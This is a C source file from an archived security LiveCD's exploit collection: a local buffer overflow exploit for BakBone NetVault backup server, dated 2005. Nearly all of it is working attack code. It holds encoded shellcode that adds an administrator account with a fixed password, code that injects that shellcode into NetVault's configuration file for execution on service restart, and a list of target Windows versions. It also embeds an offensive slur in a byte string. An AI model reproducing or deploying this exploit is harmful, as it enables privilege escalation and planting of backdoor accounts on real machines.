home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / backup / netvault / netvaultlocal.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-04-05  |  4KB  |  140 lines

---

1. /*
2. for more informations class101.org/netv-locsbof.pdf 
3. */
4.  
5. #include <stdio.h>
6. #include <string.h>
7. #ifdef WIN32
8. #include "winsock2.h"
9. #pragma comment(lib, "ws2_32")
10. #else
11. #include <sys/socket.h>
12. #include <sys/types.h>
13. #include <netinet/in.h>
14. #include <netinet/in_systm.h>
15. #include <netinet/ip.h>
16. #include <netdb.h>
17. #include <arpa/inet.h>
18. #include <unistd.h>
19. #include <stdlib.h>
20. #include <fcntl.h>
21. #endif
22.  
23. char scode1[]=
24. /*add u:class101 p:class101 (*Administrators *users)*/
25. "\x33\xC9\x83\xE9\xC7\xE8\xFF\xFF\xFF\xFF\xC0\x5E\x81\x76\x0E\x15"
26. "\x90\x39\xE8\x83\xEE\xFC\xE2\xF4\xE9\x78\x7F\xE8\x15\x90\xB2\xAD"
27. "\x29\x1B\x45\xED\x6D\x91\xD6\x63\x5A\x88\xB2\xB7\x35\x91\xD2\x0B"
28. "\x3B\xD9\xB2\xDC\x9E\x91\xD7\xD9\xD5\x09\x95\x6C\xD5\xE4\x3E\x29"
29. "\xDF\x9D\x38\x2A\xFE\x64\x02\xBC\x31\x94\x4C\x0B\x9E\xCF\x1D\xE9"
30. "\xFE\xF6\xB2\xE4\x5E\x1B\x66\xF4\x14\x7B\xB2\xF4\x9E\x91\xD2\x61"
31. "\x49\xB4\x3D\x2B\x24\x50\x5D\x63\x55\xA0\xBC\x28\x6D\x9F\xB2\xA8"
32. "\x19\x1B\x49\xF4\xB8\x1B\x51\xE0\xFC\x9B\x39\xE8\x15\x1B\x79\xDC"
33. "\x10\xEC\x39\xE8\x15\x1B\x51\xD4\x4A\xA1\xCF\x88\x43\x7B\x34\x80"
34. "\xFA\x5E\xD9\x88\x7D\x08\xC7\x62\x1B\xC7\xC6\x0F\xFD\x7E\xC6\x17"
35. "\xEA\xF3\x54\x8C\x3B\xF5\x41\x8D\x35\xBF\x5A\xC8\x7B\xF5\x4D\xC8"
36. "\x60\xE3\x5C\x9A\x35\xF3\x55\x89\x66\xE3\x08\xD8\x24\xB0\x5A\x84"
37. "\x74\xE3\x4A\xD9\x25\xA1\x19\xC7\x54\xD4\x7D\xC8\x33\xB6\x19\x86"
38. "\x70\xE4\x19\x84\x7A\xF3\x58\x84\x72\xE2\x56\x9D\x65\xB0\x78\x8C"
39. "\x78\xF9\x57\x81\x66\xE4\x4B\x89\x61\xFF\x4B\x9B\x35\xF3\x55\x89"
40. "\x66\xE3\x08\xD8\x24\xB0\x16\xA9\x51\xD4\x39\xE8";
41.  
42.  
43. static char payload[8000];
44. FILE *fl, *fl2;
45. char *fp, line[1024];
46.  
47. int check(int argc,char *argv[]),i=0,j=0;
48. int check2();
49. void ver();
50. void usage(char* us);
51.  
52. char EOL[]="\x0D\x0A";
53. char esp[]="\xDD\x20\x02\x10";
54. char vul[]="\x4E\x61\x6D\x65\x3D";
55. char fun[]="\x3C\x63\x30\x64\x33\x72\x3E\x20\x27\x6C\x6F\x20\x49\x27\x6D\x20"
56. "\x67\x61\x79\x20\x49\x27\x6D\x20\x66\x72\x6F\x6D\x20\x49\x48\x53";
57.  
58.  
59. int main(int argc,char *argv[])
60. {
61. ver();
62. if (argc>5||argc<2||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
63. if (check(argc,argv)==-1){return -1;}
64. while (!feof(fl))
65. {
66. fgets(line, sizeof(line),fl);
67. if (strstr(line,vul)){
68. i++;j++;}
69. if (i==2){
70. strcpy(line,vul);
71. memset(line+5,0x90,600);
72. memcpy(line+252,esp,4);
73. memcpy(line+16,fun,32);
74. memcpy(line+260,scode1,strlen(scode1));
75. memcpy(line+605,EOL,2);i=0;j++;
76. }
77. strcat(payload,line);
78. }
79. if (strstr(payload,vul)==NULL||j==1){
80. printf("[+] \"%s\" isn't a default NetVault file..\n",fp);return -1;}
81. if (check2()==1){
82. fprintf(fl,"%s",payload);
83. printf("[+] \"%s\" correctly exploited\n",fp);
84. printf("[+] a service restart is needed to execute the payload\n");
85. }
86. else printf("[+] can't write to \"%s\", something is wrong...\n",fp);
87. return 0;
88.  
89. }
90.  
91. int check(int argc,char *argv[])
92. {
93. if (argc>2){fp=argv[2];}
94. else fp="configure.cfg";
95. if ((fl =fopen(fp,"r+"))==NULL){
96. printf("[+] \"%s\" not found or no rights to read/write\n",fp);return -1;}
97. return 1;
98. }
99.  
100. int check2()
101. {
102. if ((fl =fopen(fp,"r+"))==NULL)
103. return -1;
104. else return 1;
105. }
106.  
107. void usage(char* us) 
108. { 
109. printf("[+] . 101_netv.exe Target (adduser mode) \n");
110. printf("[+] . 101_netv.exe Target YourFile.cfg (adduser mode) \n");
111. printf("TARGETS: \n");
112. printf("[+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
113. printf("[+] 1. Win2k SP4 Pro English (*) - v5.0.2195 \n");
114. printf("[+] 1. WinXP SP0 Pro. English - v5.1.2600 \n");
115. printf("[+] 1. WinXP SP1 Pro. English (*) - v5.1.2600 \n");
116. printf("[+] 1. WinXP SP1a Pro. English (*) - v5.1.2600 \n");
117. printf("[+] 1. WinXP SP2 Pro. English (*) - v5.1.2600.2180 \n");
118. printf("[+] 1. Win2k3 SP0 Server English (*) - v5.2.3790 \n");
119. printf("NOTE: \n");
120. printf("The exploit mods the netvault's cfg file to add a win32 \n");
121. printf("user:class101 pass:class101 after a restart of the netvault service. \n");
122. printf("A wildcard (*) mean tested working, else, supposed working. \n");
123. printf("A symbol (-) mean all. \n");
124. printf("Compilation msvc6, cygwin, Linux. \n");
125. return;
126. }
127.  
128. void ver()
129. { 
130. printf(" \n");
131. printf("==================================[v0.1]====\n");
132. printf("=====BakBone NetVault, Backup Server===============\n"); 
133. printf("=====Computername, Local Buffer Overflow Exploit=========\n");
134. printf("======coded by class101=======[Hat-Squad.com 2005]=====\n");
135. printf("============================================\n");
136. printf(" \n");
137. }
138.  
139.  
140.